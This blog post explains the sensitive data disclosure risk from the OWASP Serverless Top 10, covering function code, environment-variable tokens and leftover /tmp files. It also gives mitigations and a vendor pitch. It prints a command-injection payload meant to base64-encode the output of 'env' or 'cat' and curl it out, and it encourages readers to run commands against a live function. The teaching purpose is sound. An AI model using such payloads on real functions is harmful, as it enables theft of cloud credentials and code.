Great news! The first release of the OWASP Serverless Top 10 is out! And so, we continue with this blog post series, taking you on a journey through the new, lawless land of serverless security, where a sheriff (your security controls) cannot be deployed, and both hackers and developers struggle to understand how they should act. In the previous posts, I dove into the Event Injection and Broken Authentication attacks. In this 3rd post of the series, I am going to talk about one of the most concerning risks for organizations: OWASP Serverless Top 10 Sensitive Data Disclosure.

What is Considered Sensitive Data Disclosure?

We all hear about major data leaks, including recent ones like the breach of 50 million Facebook users. While it is usually the end users whose privacy is compromised, the cost to organizations can be very high as well. In extreme cases, a data breach can even shut down a company completely. Perhaps the most relevant example is Code Spaces, a former SaaS provider whose Amazon Elastic Compute Cloud (EC2) control panel was accessed by an attacker. The hacker “… removed all EBS snapshots, S3 buckets, all AMIs, some EBS instances, and several machine instances,” eventually driving this AWS-based company out of business.

If you think to yourself, “Well, I know all of that. But how is it any different in a serverless architecture?” then you’re in the right place.

The Code Spaces attack was back in 2014, well before the term “serverless” appeared, at least in this context. However, some of the cloud services and resources that were accessed (e.g. S3) are part of a complete serverless solution. If we add a couple of functions to the equation (in math, this sentence would’ve made no sense), rearrange some letters (was it clear that I meant AMI→IAM?) and maybe add a few other 3-letter acronyms (e.g. EFS, SQS, SES, etc.), then the risk is the same: if the data is not well protected, then it is at high risk.

Now you’re probably saying, “So? We have a few other data sources, but the attack vectors are the same,” and you’re not completely wrong (two points for you!). But we must now look at the big picture from different angles.

The first angle, and perhaps the one closest to what you already know, is how we handle our data: protect it at rest and in transit. Encrypt your sensitive data in cloud storage, backups and databases. Your service provider usually gives you tools to do this easily and correctly; use their KMS/Key Vault to securely manage your encryption keys and secrets. Also make sure your resources are configured correctly, so you won’t end up with a big leak or even a shutdown. And, of course, make sure not to leak keys into your code repository or any other place that might end up in the wrong hands.
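As a minimal sketch of at-rest encryption with the provider's KMS, assuming AWS S3 and boto3: the helper below only assembles the keyword arguments for boto3's S3 `put_object` call, asking S3 to encrypt the object server-side under a specific KMS key (`ServerSideEncryption="aws:kms"` plus `SSEKMSKeyId`). It makes no network calls, and the bucket, object key and KMS key ARN are hypothetical placeholders.

```python
def encrypted_put_kwargs(bucket: str, key: str, body: bytes, kms_key_arn: str) -> dict:
    """Arguments for boto3's S3 put_object that request SSE-KMS encryption.

    Pure data: nothing here contacts AWS.
    """
    return {
        "Bucket": bucket,
        "Key": key,
        "Body": body,
        # Ask S3 to encrypt the object at rest under this specific KMS key.
        "ServerSideEncryption": "aws:kms",
        "SSEKMSKeyId": kms_key_arn,
    }


# Hypothetical placeholders; substitute your own bucket, key and KMS key ARN.
kwargs = encrypted_put_kwargs(
    "example-sensitive-bucket",
    "customers/records.json",
    b'{"customer_id": 42}',
    "arn:aws:kms:us-east-1:111122223333:key/example-key-id",
)
```

With credentials configured, the upload itself would be `boto3.client("s3").put_object(**kwargs)`. Bucket-level default encryption is an alternative that does not rely on every caller remembering these arguments.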

For data in transit, just make sure you are using TLS for all your connections (the default when calling the provider services).
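Calls your function makes to services outside the provider's SDKs are your own responsibility. A minimal sketch using only Python's standard library: `strict_tls_context()` builds an SSL context that verifies certificates and hostnames and refuses anything older than TLS 1.2, and the hypothetical `fetch()` helper refuses non-HTTPS URLs outright. Both names are illustrative, not part of any provider SDK.

```python
import ssl
import urllib.request


def strict_tls_context() -> ssl.SSLContext:
    """SSL context for outbound calls from a function (illustrative helper)."""
    ctx = ssl.create_default_context()            # system CA bundle, sane defaults
    ctx.verify_mode = ssl.CERT_REQUIRED           # reject unverifiable certificates
    ctx.check_hostname = True                     # certificate must match the host
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2  # no SSLv3 / TLS 1.0 / TLS 1.1
    return ctx


def fetch(url: str, timeout: float = 10.0) -> bytes:
    """Hypothetical helper: GET a URL, but only over verified TLS."""
    if not url.lower().startswith("https://"):
        raise ValueError(f"refusing to send data over a non-TLS URL: {url}")
    with urllib.request.urlopen(url, context=strict_tls_context(), timeout=timeout) as resp:
        return resp.read()
```

Rejecting plain `http://` up front means a misconfigured endpoint fails loudly instead of silently sending data in the clear.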

The second, and most interesting, angle is the data in our new serverless runtime environment. Wouldn’t we freak out if we discovered that our /etc/passwd and /etc/shadow files had been compromised, whether on our own servers or in the cloud (e.g. EC2)? Guess what? In serverless, they’re not sensitive anymore. I would even consider giving them to attackers if they asked nicely.

Why is that? Because the operating system now belongs to the service provider, and our functions run in a generic environment.

So, what do we need to protect? This is the most important question here. The answer is quite simple, but may vary for different providers.

A. Your Code

You might not have a server, but your code is stored in cloud storage or a cloud repository (which is not part of your responsibility) and is loaded into the function’s runtime environment. Its location depends on the runtime and the provider. For example:

On AWS with Node.js, you can find your code in the current directory (./), which is exactly where you’ll find your Python code on GCP, and which differs from its location on AWS (/var/task). I’ll let you explore by yourself: use the following GCP function to run the cat and ls commands on any file or directory.

[code]curl -X POST -H "Content-Type: application/json" --data '{"ls":"./"}' | base64 --decode[/code]
[code]curl -X POST -H "Content-Type: application/json" --data '{"cat":""}' | base64 --decode[/code]
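Anyone who can execute code inside the function can find and read this directory. A short sketch of how that lookup works, assuming AWS Lambda, where the runtime sets the reserved `LAMBDA_TASK_ROOT` variable to the code path (typically /var/task); falling back to the current directory for other providers is an assumption based on the paths above. The helper names are hypothetical.

```python
import os


def code_directory() -> str:
    """Where the function's own code lives in the runtime.

    AWS Lambda sets LAMBDA_TASK_ROOT; the fallback to the current
    directory is an assumption for other providers and runtimes.
    """
    return os.environ.get("LAMBDA_TASK_ROOT", os.getcwd())


def list_code_files() -> list:
    """Return every file under the code directory, relative to it."""
    root = code_directory()
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            found.append(os.path.relpath(os.path.join(dirpath, name), root))
    return sorted(found)
```

This is essentially what the `ls` and `cat` calls above do from the outside: the deployment package, including any bundled config files, is plain readable data to code running in the environment.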

B. Your Secrets

Again, this varies between providers. If we take AWS as an example, there are two parts. The first is the part you do not control, which is simply given to the function: environment variables containing information about your function, such as its memory configuration, log group name, version and more. But most important of all are the function’s tokens.

These tokens represent the function’s permissions in the account. So, if the function has a permissive role in the account (most of them do), even for something like scanning a database or editing buckets, it could lead to a disaster if the tokens fall into an attacker’s hands. Attackers won’t even have to use your function anymore; they can simply run any AWS CLI command with the tokens from their own computer (for example, with an AWS CLI profile named stolen_keys that contains the stolen AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and AWS_SESSION_TOKEN).
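To make concrete what a plain `env` dump reveals on AWS Lambda, the sketch below splits the runtime-provided variables into the role's temporary credentials and some of the non-secret metadata mentioned above. The variable names are the reserved Lambda ones; `runtime_exposure` is a hypothetical helper, and it masks credential values so its own output is safe to log.

```python
import os
from typing import Mapping

# Reserved variables set by the AWS Lambda runtime: the execution role's
# temporary credentials. Anyone who reads these can act as the function.
CREDENTIAL_VARS = ("AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN")
# A few of the non-secret metadata variables the runtime also provides.
METADATA_VARS = (
    "AWS_LAMBDA_FUNCTION_MEMORY_SIZE",
    "AWS_LAMBDA_LOG_GROUP_NAME",
    "AWS_LAMBDA_FUNCTION_VERSION",
)


def runtime_exposure(env: Mapping[str, str] = os.environ) -> dict:
    """Summarize what an `env` dump would reveal, with secrets masked."""
    return {
        # Keep only presence and length of each credential, never the value.
        "credentials": {
            name: f"<redacted, {len(env[name])} chars>"
            for name in CREDENTIAL_VARS
            if name in env
        },
        "metadata": {name: env[name] for name in METADATA_VARS if name in env},
    }
```

Note that masking only protects your own logs; code injected into the function reads the raw values directly, which is why the role behind them must be kept narrow.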

Since these tokens exist whether you like it or not, you want to limit each function’s role to the exact actions it needs and nothing more. If the function reads from an S3 bucket, make sure its permissions only allow it to read the one item it needs, and only from that specific bucket; the same goes for any other resource.
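As a sketch of what “exactly the action it needs” looks like on AWS, the helper below builds an IAM policy document that grants read access to a single object in a single bucket and nothing else. The bucket and key names are hypothetical; the resulting JSON would be attached to the function’s execution role.

```python
import json


def read_one_object_policy(bucket: str, key: str) -> dict:
    """IAM policy allowing only s3:GetObject on one object in one bucket."""
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Action": "s3:GetObject",                    # read only: no List/Put/Delete
                "Resource": f"arn:aws:s3:::{bucket}/{key}",  # one object, no wildcards
            }
        ],
    }


policy = read_one_object_policy("example-config-bucket", "settings/app.json")
print(json.dumps(policy, indent=2))
```

If the stolen tokens carry only this policy, the attacker can read one object they could probably already reach through the function, rather than scanning databases or editing buckets.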

The part that you do control is your own secrets, passed to the function as environment variables. They are all accessible the same way: by reading them in code or through a system process. If they contain sensitive information, you should consider encrypting them. That way, a system process won’t be able to see their real values (look back at the screenshot of the env). But if the function is vulnerable to code injection, then the attacker could simply run the same code that you use to decrypt the value.

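[code]import os, boto3
from base64 import b64decode
ENCRYPTED = os.environ['third_party_api_key']  # base64-encoded KMS ciphertext
DECRYPTED = boto3.client('kms').decrypt(CiphertextBlob=b64decode(ENCRYPTED))['Plaintext'].decode('utf-8')  # plaintext secret[/code]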

C. Your Files

In the serverless environment, the file system is read-only except for the /tmp folder, which is where your app writes its files, if any. Let me use my psychic powers again and tell you what you’re thinking now… Isn’t the serverless environment ephemeral, with all files deleted after the function completes its execution? And again, you wouldn’t be completely wrong. It’s true, but not always. The function’s environment is only completely deleted if the function remains idle for a period of time (on AWS, that is around 4 minutes). However, if there is at least one call in that time frame, it will probably land on the same environment as before. It’s not guaranteed, but some of the events in that time frame will get there. This reuse is, of course, done for performance reasons.
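The reuse is easy to reproduce locally. The sketch below is a simulation, not provider code: it assumes that a warm invocation is just another call in the same process, sharing module-level state and the same scratch directory. `TMP_DIR` stands in for /tmp, and the handler and file names are hypothetical.

```python
import os
import tempfile

# Stand-in for /tmp so the simulation runs anywhere (hypothetical setup).
# Module-level code like this runs once per environment, on a cold start.
TMP_DIR = tempfile.mkdtemp()
SCRATCH = os.path.join(TMP_DIR, "report.csv")


def handler(event: dict, context=None) -> dict:
    """Toy function: reports any scratch file left by an earlier call, then
    writes its own sensitive scratch file and (wrongly) never deletes it."""
    leftover = None
    if os.path.exists(SCRATCH):
        with open(SCRATCH) as f:
            leftover = f.read()
    with open(SCRATCH, "w") as f:
        f.write(event.get("customer", ""))
    return {"leftover_from_previous_call": leftover}


# Two invocations handled by the same warm environment (here: the same process).
first = handler({"customer": "alice,account=12345"})
second = handler({"customer": "bob"})
print(first)   # {'leftover_from_previous_call': None}
print(second)  # {'leftover_from_previous_call': 'alice,account=12345'}
```

On a real platform, the second call only sees the file if it lands on the same warm environment, which, as described above, is likely but not guaranteed.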

If your function is vulnerable and has used a file containing sensitive information, that data might be accessed and exfiltrated. To show you how this works, you can use the two curl commands I gave before. Both calls write their output (base64-encoded) to the /tmp/b64 file.

When you run the “ls” call first, you will see that the size of the /tmp/b64 file is 252 bytes. However, if you run the “cat” call first and then the “ls” call, you will see that the file size is different: 1496 bytes. In other words, the “ls” call sees the file left behind by the previous “cat” call. Of course, if you then run the “ls” call again, the 252 bytes are back, since the previous call was an “ls”.

When do we have to worry? When our code is vulnerable to any type of code injection, either through a process or an expression API (e.g. eval), whether the developer caused it or a dependency did. In that case, the attacker could access and/or modify our sensitive data. As an example, let’s say that the function I gave you was vulnerable (is it?) to command injection via the JSON value. An attacker could then simply run:

[code]--data '{"ls":"/tmp; code=`$secret | base64 --wrap=0`; curl$code"}'[/code]

Here, $secret can be “cat” (on one of our source files) to get our code; simply “env” to steal our tokens and secrets from the environment variables; or “cat /tmp/leftover.file” to get a sensitive file that was left unprotected under the /tmp folder.

You tried it, didn’t you? The command above prints the secret, encodes it as base64 and sends it to the attacker’s favourite location. Now, all they have to do is decode it and voilà! You’re in the news…
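One way to close this hole, sketched under the assumption that the function’s “ls” action was implemented by passing the JSON value to a shell: drop the shell and treat the value purely as data. `handle_ls` is a hypothetical name; the same idea applies to the “cat” action (open the file from Python instead of spawning cat).

```python
import os


def handle_ls(event: dict) -> list:
    """Safer take on the 'ls' action: no shell is involved.

    The vulnerable pattern looks like
        subprocess.run("ls " + event["ls"], shell=True)
    where a value such as "/tmp; env" makes the shell run a second command.
    Here the value is only ever treated as a path.
    """
    path = event.get("ls", ".")
    if not isinstance(path, str) or not os.path.isdir(path):
        raise ValueError(f"not an existing directory: {path!r}")
    return sorted(os.listdir(path))
```

This still lets a caller list any directory the function can read; an allowlist of permitted paths would tighten it further.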

How to Prevent Sensitive Data Disclosure?

Protecting Against the OWASP Serverless Top 10 Sensitive Data Disclosure

Bottom line, what do we do about it? I’ll try to summarize:

  • Minimize storage of sensitive data to only what is absolutely necessary.
  • Always protect sensitive data at rest and in transit. Whenever possible, use your infrastructure provider’s crypto and key management services for stored data, secrets and environment variables (e.g. AWS Environment variable encryption, Handling Azure secrets, Storing secrets in GCP).
  • Avoid leaking keys in your code repository and any other shared location.
  • Limit attack surface via restrictive permissions for your functions.
  • Perform code review and static analysis to avoid vulnerabilities in your code.
  • Monitor dependencies to avoid introducing known vulnerabilities into your app.
  • Delete sensitive files from /tmp when you finish using them.
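For the last point, a minimal sketch using Python’s `tempfile.TemporaryDirectory`, which deletes the directory and its contents when the `with` block exits, even if processing raises. `process_sensitive` and the file name are hypothetical; the path is returned only so a caller can confirm the file is gone.

```python
import os
import tempfile


def process_sensitive(data: bytes) -> tuple:
    """Stage sensitive bytes in a scratch file, use it, and guarantee cleanup.

    Returns (size, path); the path is returned only so callers can check
    that the file no longer exists.
    """
    # TemporaryDirectory() creates its directory under tempfile.gettempdir(),
    # which is /tmp on Linux unless TMPDIR points elsewhere.
    with tempfile.TemporaryDirectory() as workdir:
        path = os.path.join(workdir, "decrypted.bin")
        with open(path, "wb") as f:
            f.write(data)
        # ... pass `path` to whatever library insists on a file on disk ...
        size = os.path.getsize(path)
    # Leaving the `with` block deleted workdir and everything inside it,
    # even if an exception had been raised above.
    return size, path
```

Compared with a manual `os.remove` at the end of the handler, the context manager also cleans up on the error path, which is exactly when leftovers tend to be forgotten.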

Protego Labs’ serverless security solution would not only alert on sensitive data found in your source code or environment variables; it would also automate everything else for you, continuously, as part of your CI/CD.

Protego’s solution also detects vulnerable dependencies, over-privileged functions and open resources, as well as behavioral anomalies and attacks at runtime.


Don’t panic! Get educated by subscribing to this blog series.
